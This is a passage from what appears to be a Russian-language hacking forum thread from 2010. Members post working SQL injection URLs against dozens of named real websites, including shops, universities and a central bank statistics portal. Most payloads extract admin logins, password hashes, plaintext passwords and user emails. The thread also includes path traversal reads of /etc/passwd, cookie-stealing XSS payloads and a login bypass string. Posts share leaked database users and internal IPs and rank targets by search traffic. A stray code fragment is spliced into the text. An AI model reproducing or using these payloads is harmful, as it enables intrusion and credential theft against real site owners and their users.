http://mec1rgqh.panontrade.com/offers.php?id=885+and+1=0+union+select+1,2,3,4,5,6 ,group_concat(es_admin_name,char(58),es_pwd),8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23+from+esb2 b_admin&file=Products&prod=sell&uid=mec1rgqh
читалка
входим в админку(http://panontrade.com/admin)
http://panontrade.com/admin/manage_pages.php?curr_page=passwd&curr_subdir=../../../../../../../../../../etc
XSS
и конечно же xss
http://panontrade.com
в поле поиска пишем ">alert()
и еще один xss в админке, http://panontrade.com/admin/edit_link.php
в поле Contact Person пишем ">alert(document.cookie)
http://ugc.sollies.free.fr/joo154/m/un.php?id=-472+union+select+TABLE_NAME,2,3,4,5,6+FROM+INFORMA TION_SCHEMA.TABLES--
http://www.unostra.com/union.php?id=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.thailabordatabase.org/en/union.php?c=detail&id=-1312+union+select+1,2,3,4,5,database(),7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55--
http://www.unionradioirun.com/union.php?s=pro&s2=&pag=1&id=-197+union+select+database()--
это просто от скуки
Code:
http://www.znaki.chebnet.com/s10.php?id=-660+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7+--+
ну а это вроде игровой портал
Яндекс тИЦ: 210
Яндекс.Rank: 4
Google PageRank: 3/10
Code:
http://www.gamesector.org/review.php?id=-141+union+select+1,2,concat_ws(0x3a,nick,icq,email ),4,5,6,7,8,9,10,11+from+gs_authors+--+
http://www.sw-rent.pl/index.php?id=00000103+or+(select+count(*)from(sele ct+1+union+select+2+union+select+3)x+group+by+conc at(mid((select+version()),1,64),floor(rand(0)*2)))--
http://www2.kro.nl/boemerang/index.php?offset=876&logid=-175+UnIon+selECt+1,2,3,version%28%29,5,6,7,8,9,10, 11,12,13,14,15+--+
Тупейший вывод таблиц)
http://www.linkdump.be/index.php?y=2006&m=2+and+1=0+union+select+version%28%29,2,3,4,5,6,7 ,8+--+
AVON
http://avon4u.ru/news.php?id=-443+and+1=2+union+select+1,2,concat(@@version,0x20 ,user(),0x20,database(),0x20,@@version_compile_os) ,4,5,6,7,8,9,10,11+--
version : 5.0.89-log
user : wtavon4u@localhost
database : wtavon4u
os : unknown-freebsd7.2
-PRIVAT-
01.09.2010, 13:36
http://www.rusdeutsch.eu/print_text.php?id=-3662+union+select+1,concat%28@i:=0x00,@o:=0x0d0a,b enchmark%2815,@o:=CONCAT%28@o,0x0d0a,%28SELECT+con cat%28table_schema,0x2E,@i:=table_name%29+from+inf ormation_schema.tables+WHERE+table_name%3E@i+order +by+table_name+LIMIT%201%29%29%29,@o%29,3,4,5,6,7, 8,9,0,1,2,3%20--
http://www.shefgoda.ru/?part=news&newsid=-36+union+select+1,concat_ws(0x3a,Login,Password,IC Q),3,4,5,6,7,8,9,0,1,2+from+chief_users
ТИЦ 10 ПР 4
" if author else f"
http://www.rusdeutsch.eu/print_text.php?id=-3662+union+select+1,concat%28@i:=0x00,@o:=0x0d0a,b enchmark%2815,@o:=CONCAT%28@o,0x0d0a,%28SELECT+con cat%28table_schema,0x2E,@i:=table_name%29+from+inf ormation_schema.tables+WHERE+table_name%3E@i+order +by+table_name+LIMIT%201%29%29%29,@o%29,3,4,5,6,7, 8,9,0,1,2,3%20--
http://www.shefgoda.ru/?part=news&newsid=-36+union+select+1,concat_ws(0x3a,Login,Password,IC Q),3,4,5,6,7,8,9,0,1,2+from+chief_users
ТИЦ 10 ПР 4
-PRIVAT-
01.09.2010, 13:37
Привет всем! На днях нашёл уязвимый сайт. Смотрю, внизу стоит ссылка на разраюотчика, я естественно перешёл по ней и все сайты оказались... уязвимы! Их было около 30. Но, вот в чём была проблема, у всех одинаковые хеши, увы, рассшифровать их, никто не смог (на Ачате). Вот сам сайт разработчика webinstruments.ru (http://webinstruments.ru) . Снизу, скуля на нём
http://webinstruments.ru/?part=news&newsid=-4+union+select+1,concat_ws%280x3a,ID,Login,Passwor d%29,3,4,5,6,7,8,9,0,1,2+from+FE_se_users--
ТИЦ10(R2) PR2
http://ures.ru/?subsectionid=21+union+select+1,2,3,4,5,6,7,8,9,0, 1,2,3,4%20--
ТИЦ10(R2)
http://www.bbp-alians.ru/?part=projects&movieid=-12+union+select+1,concat_ws%280x3a,ID,Login,Passwo rd,ICQ%29,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+a lliance_users--
ТТИЦ10(R2) PR2
http://www.map-wzm.ru/?part=news&newsid=-2+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3--
ТИЦ10(R2) PR1
http://petersburg-tour.ru/?part=ny&subsectionid=-226+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%20--
ТИЦ40YC(R3) PR4
http://kino-focus.ru/?part=projects&elementid=17+union+select+1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5%20--
http://www.shefgoda.ru/?part=news&newsid=-36+union+select+1,concat_ws(0x3a,Login,Password,IC Q),3,4,5,6,7,8,9,0,1,2+from+chief_users --
ТИЦ60(R3) PR3
http://www.moscowatch.ru/swissmade_brand.php?BrandId=-2+union+select+1,2,3--
ТИЦ70YC(R3) PR5
http://www.goldenpuzzle.ru/?part=gallery§ion=code4&subsectionid=-1276+union+select+1,concat_ws%280x3a,Login,Passwor d,ICQ%29,3,4,5,6,7,8,9,0,1,2,3,4,5,6+from+puzzle_u sers--
ТИЦ20(R2) PR20
http://www.fregat-blagodat.ru/?part=events&newsid=21+union+select+1,concat_ws(0x3a,Login,Pass word,ICQ),3,4,5,6,7,8,9,0,1,2+from+con_sltr__users--
ТИЦ20(R2) PR2
http://www.pravdinskoe.ru/?part=news&newsid=29+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3%2 0--
ТИЦ20(R2)
http://www.lmarsh.spb.ru/?part=portfolio&elementid=-34+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5--
http://www.mens-gifts.ru/?part=gallery&elementid=-28+union+select+1,2,3,4,5,6,7,8,9,0--
ТИЦ10(R2) PR1
http://www.lightinside.ru/?part=catalog§ion=eglo&subsectionid=-16+union+select+1,2,3,4,5,6,7,8,9,0,1%20--
ТИЦ10YC(R2) PR1
P.S
Это ещё не все сайты. Смотрите остальные в портфолио разработчика
Удачи!
Code:
http://www.formex.ru/catalog.php?id=-1003+union+select+table_name,2+from+information_sc hema.tables+limit+1,1--
stepashka_
01.09.2010, 13:51
Code:
http://www.elecboard.ru/ind.php?pn=2&id_categ=-49+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21--+
5.0.87-percona-highperf-logetrovich1975_123etrovich1975@localhost
тиц 10
PageRank 1
Code:
http://www.bbsplus.ru/ind.php?pn=9&id_categ=-13+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28--+
5.1.39:yambi_bbsplus:yambi_bbsplus@localhost
PageRank 2
Code:
http://www.elecab.ru/board/ind.php?pn=15&id_categ=-41+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21--+
4.1.25-log:elecab43_elecab:elecab43_userel@localhost
тиц 20
PageRank 2
Code:
http://www.ceit.es/index.php?option=com_personal&view=detalle&trbId=-105+UNION+SELECT+1,concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29,3,4,5,6,7%20from%20iv j_users%20limit%200,1--&catId=91&prsId=1&Itemid=25&lang=en
Username: jmuser@localhost
Version: 5.0.51a-24+lenny3
Database: ceit
Google PR: 6
http://eclassifieds.massagetoday.com/eclassified/detail.php?&id=7842'+group+by+19+/*+
там 18 полей,
немогу раскрутить)
http://www.massagetoday.com/mpacms/mt/year.php?year=2009'+union+select+1,2+/*+
а тута нету доступа к information_schema.tables
Искал запчасти
http://www.rulu.ru/catalogs/index.html?brid=538&mdl=5020+and+ascii(lower(substring((select+table_n ame+from+information_schema.tables+limit+17,1),1,1 )))%3E1
2NorB:
Боюсь тебя удивить, но в 4-ой ветке никогда не было information_schema.tables
\
Code:
http://www.best-doska.ru/ind.php?pn=229&id_typ=-191+union+select+1,2,3,4,5,6,group_concat(table_na me),8,9,10,11,12,13,14,15,16,17,18,19,20,21,2,23,2 4+from+information_schema.tables+--+
SQL Injection
http://kappaepsilon.org/index.php?inc=news&opt=details&id=-44+union+select+1,concat(username,char(58),passwor d),3+from+admins
качалка файлов
http://kappaepsilon.org/open_files/file.php?file=../../../../../../../../../../../etc/passwd&name=antichat
PR-5
http://www.opened.ru/scenary/index.php?id=-207+union+select+1,2,3,4,5,6,7,8,group_concat(conc at(table_name,0x3a,table_rows)separator+0x3c62723e ),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,4+from+information_schema.tables--+
stepashka_
01.09.2010, 21:07
Code:
http://www.mckn.ru/gocka/ind.php?pn=4&id_categ=-2+union+select+1,2,3,4,5,UNHEX(HEX(concat_ws(0x3a, version(),database(),user()))),7,8,9,10,11,12,13,1 4,15--+
4.1.11-Debian_4sarge5-log:z59769_mckn:z59769_mckn@77.221.130.17
тиц 230
PageRank 2
Code:
http://www.aslalab.ru/cat/ind.php?pn=4&id_typ=-10+union+select+1,2,3,4,5,6,(concat_ws(0x3a,versio n(),database(),user())),8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23--+
5.1.43-log:wwwaslalabru_msql3:aslalab_msql3@fe93.hc.ru
PageRank 4
http://www.swiftnets.com/store/category.asp?CatID=2+and+1=@@version
в поле логина
http://www.swiftnets.com/resellerlogin.asp
' or 1=1--
--------------
AJS.org
http://www.ajs.org/cart/thumbnail.asp?subject_id=2+union+select+1+from+use rs
PR-7
[Feldmarschall]
02.09.2010, 01:14
Bank of Peru [Banco Central de Reserva del Peru]
Code:
http://estadisticas.bcrp.gob.pe/index.asp?sFrecuencia='+or+1=(select top 1 table_name from information_schema.tables)--+
Microsoft SQL Server 7.00 - 7.00.1094 (Intel X86) May 29 2003 15:21:25 Copyright (c) 1988-2002 Microsoft Corporation Desktop Edition on Windows NT 4.0 (Build 1381: Service Pack 6)
учебные заведения
Code:
http://ecirgroup.com/edu.php?id=-2+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8+--+
Code:
http://www.mmsshyj.com/wenming/edu.php?id=38&type=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9+--+
Code:
http://me.eng.kmitl.ac.th/news-edu.php?id=-28+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3+--+
Code:
http://cs.montclair.edu/php/profile.php?id=-111+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,version(),database(),user()),13,14,15,16+--+
http://www.infoflot.ru//newslenta/pheed.php?newsid=2866+and+1=0+union+select+1,table _name,3+from+information_schema.tables+--+
тИЦ:550
necr0log
02.09.2010, 14:26
http://www.bazar-auto.ru/view.php?s=list&type=cars&sost=2&cityid=&b_id=&m_id=&car%5Bcost1%5D=&car%5Bcost2%5D=3000'))+and+(select+email+from+tbl_ admin_users+where+id=2)=NULL+--+&qcurrency=USD&car%5Byear1%5D=&car%5Byear2%5D=&x=32&y=11
слепая скуль
https://www28.safesecureweb.com/thunderwear/shop_detail.asp?Product_ID=64+union+select+1,2,3,4 ,5,6,7,8,9+from+msysaccessobjects
Terminolog
02.09.2010, 18:15
Code:
http://www.urbandictionary.com/define.php?term=unfathomable%20number-999.9+union+select+1,2,3,4-
ТИЦ 350 PR 6
Code:
http://www.joblo.com/dvdclinic/index.php?id=1900-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31--
ТИЦ 170 PR 6
*uNkN0Wn*
02.09.2010, 18:28
Code:
http://www.cosplay1.com/dtProduct.php?pId=-262+union+select+1,2,3,4,5,6,group_concat(username ,char(58),password),8,9,10,11,12,13,14+from+adminc 0sp+--+
http://www.wndesherbinin.com/product.php?c=8&p=8&cp=-4391+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22--
http://farayab.asia/products.php?page=id&id=-12+union+select+1,version(),3,4--
http://www.tangerinedream-music.com/download/cover.popup.php?pidp=-60+union+select+1,2,aes_decrypt(aes_encrypt(versio n(),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
http://www.colray-crafts.com/big.php?ProductID=-23263+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17
Terminolog
02.09.2010, 22:09
Code:
http://songsofpraise.org/song.php?songid=299-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4--
ТИЦ 20
PR 4
--------------------------------------------------------
Code:
http://www.feldgrau.com/articles.php?ID=30-999.9+union+select+1,2,3,4,5,6,7,8--
ТИЦ 40
PR 5
--------------------------------------------------------
Code:
http://www.sermonindex.net/modules/newbb/viewtopic.php?topic_id=28897&forum=36&2-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
ТИЦ 10
PR 5
--------------------------------------------------------
Code:
http://www.standardmedia.co.ke/InsidePage.php?id=2000016504&cid=4-999.9+union+select+1,2,3,4,5--
ТИЦ 70
PR 5
--------------------------------------------------------
Code:
http://www.megauploadbay.com/download.php?id=578970&name=besieged+1998+dvdrip+part3+rar-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--
ТИЦ 10
PR 0
--------------------------------------------------------
Code:
http://www.ipodhacks.com/article.php?sid=2521-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11--
ТИЦ 30
PR 6
начнем потихоньку, по мере нахождения свой пост буду редактировать
Code:
http://www.menzies.utas.edu.au/information.php?Doo=ViewData&type=Person&ID=-59+union+select+1,2,3,4,5,6,concat(user_name,char( 58),user_password),8,9+from+mausdb.users+LIMIT%200 ,1+--+
сначала крутил скулю- потом начал изучать сайт и понял что крутить скулю не надо было т к пасс и ник админа есть и на этой странице http://www.menzies.utas.edu.au/information/
Code:
http://www.rblinds.com/information.php?id=-4+union+select+1,concat_ws(0x3a,version(),database (),user())+--+
http://www.dfki.de/lt/card.php?id=-94+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
http://www.stepintub.com/states.php?id=-17+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7--
продажа джакузи=)
сайт фильмов онлайн
Code:
http://ventealcine.com/peliculas/videos/Ran.php?id=-731+union+select+1,concat(Nombre,char(58),Password ),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+vente2_v entealcine.Usuarios+--+
http://www.geniemove.com/states.php?stateid=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),5,6,7--
здесь намного все проще и если я увижу дефейс на сайте я больше не буду полностью раскрученные постить скули (т к здесь все как на ладони, включая админку)
Code:
http://www.liposuctionlistings.com/link.php?id=-8+union+select+1,concat(username,char(58),Password ),3,4,5,6+from+admin+--+
Code:
http://www.musikstunden.ch/index.php?LinkID=1+union+select+1,concat_ws(0x3a,v ersion(),user(),database())/*
Version : 5.0.32
User : wsa@localhost
Database : wsa_musikstunden
Code:
http://saunaafricaonline.com/index.php?linkID=1+union+select+1,2,concat_ws(0x3a ,version(),database(),user()),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18
MySQL : 5.1.37sp1
Database : adusu001_sauna
User : adusu001_sauna@216.239.136.31
Code:
http://www.keramikarte.de/shop/np/pheed.php?newsid=-24+union+select+1,2,table_name+from+information_sc hema.tables--+
Чета не могу вывести из таблиц что либо...
Code:
http://www.keramikarte.de/shop/np/pheed.php?newsid=-24+union+select+1,2,group_concat(user_name)+from+c pg131_users+--+
*uNkN0Wn*
03.09.2010, 20:02
http://www.westcountry-networking.com/live/shop.php?1=1&nav=shop&cat=-63+union+select+1,group_concat(username,char(58),p assword),3,4,5+from+ecom_user+--+
Вывод в тайтле
user() westcountrynetwo@localhost
version() 5.0.51a-24+lenny4
database() westcountrynetwo
Code:
http://www.intenso.de/kategorie.php?kategorie=-21%20UNION%20ALL%20SELECT%20CONCAT_WS%28CHAR%2832, 58,32%29,user%28%29,database%28%29,version%28%29%2 9,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 ,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,8 7,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102, 103,104,105,106,107,108,109,110,111,112,113,114,11 5,116,117,118,119,120,121,122,123,124,125,126,127, 128,129,130,131,132,133,134,135,136,137,138,139,14 0,141,142,143,144,145,146,147,148,149,150,151,152, 153,154,155,156,157,158,159,160,161,162,163,164,16 5,166,167,168,169,170,171,172,173,174,175--
intensode.1@localhost : intensode1 : 5.0.86-log
http://www.aeag.at/ce.php?id=-9+union+select+concat_ws(0x3a,version(),database() ,user(),@@version_compile_os)--
http://www.alt-erlaa.at/ce.php?id=-5+union+select+database()--
домены разные( сайты одинаковые
PHP:
http://www.alexandrrybak.com/mov.php?id=-12+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3--
5.0.77:rybak:tarasdb@localhost
pr3 тиц40
админские пассы выводить не стал т к хранятся они в незашифрованном виде и админку найти не сложно, поэтому- сделал вывод простого юзера
ТИЦ 120
Code:
http://zoorinok.com.ua/art.php?id=26+and+1=0+union+select+1,2,concat(user _login,char(58),user_password),4+from+user+--+
инетмагазин
ТИЦ 50
Code:
http://www.superpovar.ru/art.php?id=-6+union+select+1,2,concat(username,char(58),user_p assword),4+from+h21mobi_forum.phpbb_users+limit+1, 1+--+
Code:
http://www.sport-clubs.ru/art.php?id=432+and+1=0+union+select+concat(login,c har(58),md5)+from+zorro_aaaa.users+limit+2,1+--+
здесь вывод в title
Code:
http://www.purdes.com/blog/art.php?id=-164+union+select+1,2,3,4,5,6,7,8+--+
Code:
http://www.avtosssr.ru/art.php?id=-67+union+select+concat_ws(0x3a,version(),database( ),user()),2+--+
Code:
http://www.guevaragallery.com/art.php?id=2+and+1=0+union+select+1,concat_ws(0x3a ,version(),database(),user()),3,4+--+
*uNkN0Wn*
04.09.2010, 12:56
http://www.agenzia-limmobiliare.eu/vendita-fondo-commerciale-capannone-negozio.php?catID=-10+union+select+group_concat(nome,char(58),passwor d),2,3,4,5,6,7,8,9,10,11,12,13,14+from+immobiliare .user+--+
Вывод в самом низу.
http://www.farmasistemi.com/negozio.php?categoria=-6+union+select+1,2,group_concat(email,char(58),pas sword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25+from+clienti+--+
user() root@localhost
version() 5.1.36-log
database() farmasistemi
http://bqshopping.com.br/loja.php?id=-58+union+select+1,2,table_name,4+from+information_ schema.tables+--+
user() bqshop_user@localhost
version() 5.0.91-community
database() bqshop_data
http://www.adoropromocao.com.br/loja.php?l=-198+union+select+1,2,3,4,5,6,7,8,version(),10,11,1 2,13,14+--+
user() promocao@localhost
version() 4.1.21-standard-log
database() adoropro_adorop
http://bleep.com/index.php?page=artist_details&artistid=-2342+union+select+1,2,group_concat(email,char(58), password,0x3c62723e),4,5,6,7,8,9,10+from+cms_user+--+
stepashka_
04.09.2010, 14:26
Code:
http://karcher-ural.ru/newss.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5--+
5.0.90:b26649_karch:u26649@78.108.84.111
Code:
http://www.cto.nsk.su/newss.php?id=-21+union+select+concat_ws(0x3a,version(),database( ),user()),2,3--+
5.0.45-log:site_db:db_user@localhost
тиц 10
*uNkN0Wn*
04.09.2010, 16:21
http://www.svi04.de/xellplan/index.php?ID=7+union+select+group_concat(admin,0x3 a,admin_pass)+from+xp_sheets+--+
http://www.dp.ilsc.kuss-clubs.de/index.php?ID=415+union+select+group_concat(admin,0 x3a,admin_pass)+from+xp_sheets+--+
http://www.berlinschild1.kilu.de/xellplan-1.2/index.php?ID=16+union+select+group_concat(admin,0x 3a,admin_pass)+from+xp_sheets+--+
http://www.svinzlingen.de/xellplan/view.php?ID=2+union+select+group_concat(admin,0x3a ,admin_pass)+from+xp_sheets+--+
http://www.dp.ilsc.kuss-clubs.de/view.php?ID=299+union+select+group_concat(admin,0x 3a,admin_pass)+from+xp_sheets+--+
http://datasphere.de/plan/log.php?ID=29+union+select+1,2,3,group_concat(admi n,0x3a,admin_pass)+from+xp_sheets+--+
http://www.pinoyjokes.net/my/index.php?sbjoke_id=-505+union+all+select+1,2,3,4,concat(sbadmin_name,0 x3a,sbadmin_pwd),6,7,8,9,10,11+from+sbjks_admin--
http://www.fikra.tv/index.php?sbjoke_id=-7522+union+all+select+1,2,3,4,concat(sbadmin_name, 0x3a,sbadmin_pwd),6,7,8,9,10,11,12,13+from+sbjks_a dmin--
Вывод в тайтле
начнем
Code:
http://www.sale-info.ru/lot.php?id=-108+union+select+1,2,concat(user_login,char(58),us er_pass),4,5,6,7,8,9,10,11,12+from+new_users+--+
Международный аэропорт лосанжелеса
пароли в открытом виде
Code:
http://www.airport-la.com/parking/lot.php?id=-7+union+select+1,2,3,concat(email,char(58),passwor d),5,6,7,8,9,10,11,12,13,14+from+partners+--+
здесь пассы в БД не хранятся так что просто вывел
Code:
http://www.zagorodny-dom.ru/lot.php?id=-246+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10+--+
здесь тоже пароли в открытом виде
Code:
http://www.cincinnatiparking.info/lot.php?id=-18+union+select+1,concat(username,char(58),passwor d),3,4,5,6,7,8,9,10,11,12+from+parking.users+--+
ну или так выводим админский акк и хеш
Code:
http://www.cincinnatiparking.info/lot.php?id=-18+union+select+1,concat(user_login,char(58),user_ pass),3,4,5,6,7,8,9,10,11,12+from+wordpress3.wp_02 n0c4_users+--+
PHP:
http://www.indiajournal.com/pages/event.php?id=-11753'union+select+1,concat_ws(0x3a,version(),data base(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38+--+
http://www.indiajournal.com/pages/event.php?id=-11753'union+select+1,table_name,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38+from+information_ schema.tAbLes+limit+33,1+--+
5.1.39-log:ij:ijuser@apache2-downer.warsaw.dreamhost.com
ТИЦ10 PR5
PHP:
http://metronics.ru/good.php?id=-973347913+union+select+1,concat_ws(0x3a,version(), database(),user()),3,4,5,6,7,8,9,10,11--
http://metronics.ru/good.php?id=-973347913+union+select+1,concat(login),3,4,5,6,7,8 ,9,10,11+from+admin--
http://metronics.ru/admin/login.php
4.1.25-log:wwwmetronicsru:metronic@localhost
ТИЦ80 PR3
ну вот перебили , продолжу здесь
Международный аэропорт санфранцизко
Code:
http://www.airportsfo.org/parking/lot.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13+--+
Code:
http://www.romancecollection.com/auction/lot.php?id=1146+and+1=0+union+select+1,2,3,4,conca t(emails,char(58),rows),6,7,8+from+d60577836.rc_se ttings%20+--+
Code:
http://www.ducky-games.com/lot.php?id=-271+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12+--+
http://peticije.org/page.petition.sign.php?id=-1606+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,version(),database(),user(),@@version _compile_os)--
в print версии все выводится
http://murashka.com.ua/cms/card.php?id=3+and+1=2+union+select+1,user(),3,4,5, 6,7,8,9,10--&print=1
PHP:
http://www.cartagenamarina.es/weather.php?id=-3+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user(),@@version_compile_os),8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,230,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,9 4,95,96,97,98,99,100,101,102,103,104,105,106--
PHP:
http://www.econotrav.com/weather.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),4,5,6--
PHP:
http://www.econotrav.com/admin
расшифровать хеш я не смог админский
*uNkN0Wn*
05.09.2010, 01:36
http://www.pinoyjokes.net/my/index.php?sbjoke_id=-505+union+all+select+1,2,3,4,concat(sbadmin_name,0 x3a,sbadmin_pwd),6,7,8,9,10,11+from+sbjks_admin--
. .
http://www.raytrace.net/products.php?id=-22+union+select+1,2,3,4,5,6,7,8,group_concat(user, char(58),password,0x3c62723e),10,11,12,13,14,15,16 ,17,18+from+mysql.user+--+
http://www.averyindia.co.in/products.php?id=-247+union+select+1,2,3,version(),5,6,7,8,9+--+
http://www.gemreplica.com/products.php?id=-55+union+select+1,2,group_concat(username,char(58) ,password,0x3c62723e),4,5,6,7,8,9+from+admininfo+--+
http://harmony.musigi-dunya.az/rus/archclouselist.asp?iss=12+union+select+1,2,3+from+ msysaccessobjects
https://www.mirvaritravel.az/v2/rez3.asp?id=440+and+1=@@version
http://www.sarayevim.com/rus/ilan_yazdir.asp?id=6+and+row(1,2)in(select+count(* ),concat((select+concat_ws(0x3a,@@version,@@versio n_comment,@@version_compile_machine,@@version_comp ile_os)+from+information_schema.tables+limit+20,1) ,0x3a,floor(rand(0)*2))as+a+from+information_schem a.tables+x+group+by+a)
http://www.filmiran.org/pages/showdetailsnews.asp?offset=399&IDN=36+union+select+1,2,3,4,5,6,7,8,9,10+from+msys accessobjects
http://www.peterfige.com/dvds.php?added=1&dvd=2+and+substring(version(),1,1)=3
покер
PHP:
http://www.jeux-poker-en-ligne.com/salle-poker.php?id=-8+order+by+27--
migueli_zerbino@72.41.255.210 4.1.20-max-log migueli_casino
ни логинов ни паролей не нашел тут=(
PHP:
http://www.gppoker.be/agenda-gp-poker.php?id=-11+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5--&PHPSESSID=b79746845571ef3b7119d794e744fc90
5.0.90-log:gppokergadmin:gppokergadmin@10.0.95.102c-linux-gnu
PHP:
http://www.fr-poker-online.com/poker.php?ID=-32+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7,8,9,10, 11--
5.0.90-log:frpokerofrance:frpokerofrance@10.0.45.53c-linux-gnu
http://www.renewal-avto.ru/info.php?id=11+and+1=0+union+select+1,2,3,4,concat (login,char(58),password),6,7+from+avtorw.users+--+
и админко http://www.renewal-avto.ru/admin
PHP:
http://www.funnyboss.com/friend.php?id=-52+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),5,6,7,8,9,10--
5.0.51a-24+lenny2:funny:ccole@localhost:debian-linux-gnu
PHP:
http://www.pakvisit.com/friend.php?id=53+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
PHP:
http://www.synco.ru/razdel.php?id=-183+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4--
5.0.83-log:synco_db:synco@misantrop2
http://www.kamosline.ru/articles/news/detail.php?ID=8169+and+1=0+UnIon+selECt+1,2,3,4,5, 6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32+--+
ТИЦ: 20
http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,version(), 4,5,6,7,8,9,10,11,12,13,14,15+--+
ТИЦ: 50
http://www.maxipool.ru/articles_view.php?id=1+and+1=0+union+select+1,grou p_concat(table_name),3+from+information_schema.tab les--+
Google PageRank: 2
http://paritetbk.ru/?vs=home&page=foto&xx=1&razd_id=59+group+by+4+--+
http://www.smolensk-i.ru/view_article.php?news_id=234+and+1=0+union+select+ 1,2,3,version(),5,6,7+--+
ТИЦ: 20 Google PageRank: 3
http://www.fordimola.ru/?menu_id=1&page_id=656+group+by+7+--+
ТИЦ: 60
http://www.perepelcina.com/index.php?link=2&id=71+and+1=0+union+select+version(),2,3,4,5,6,7,8 ,9,10+--+
ТИЦ: 20 Google PageRank: 1
http://www.realtaim.ru/catalog?item_id=72+union+select+1,2,3,4,5,6,7,8,9, 10,11,12+--+
ТИЦ: 110 Google PageRank: 3
http://www.detki.ru/?page=-5+union+select+1,2,group_concat(table_name),4+from +information_schema.tables--+
ТИЦ: 190 Google PageRank: 4
http://www.rus-vent.ru/?menu=page&id=21+group+by+2+--+
ТИЦ : 80 PR: 3
http://www.garden-center.ru/morenews.php?mode=full&id=28+and+1=0+UnIon+selECt+1,group_concat%28table_ name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26+from+information_schema.tab les--+&marker=%CD%EE%E2%EE%F1%F2%E8
ТИЦ : 10 PR: 2
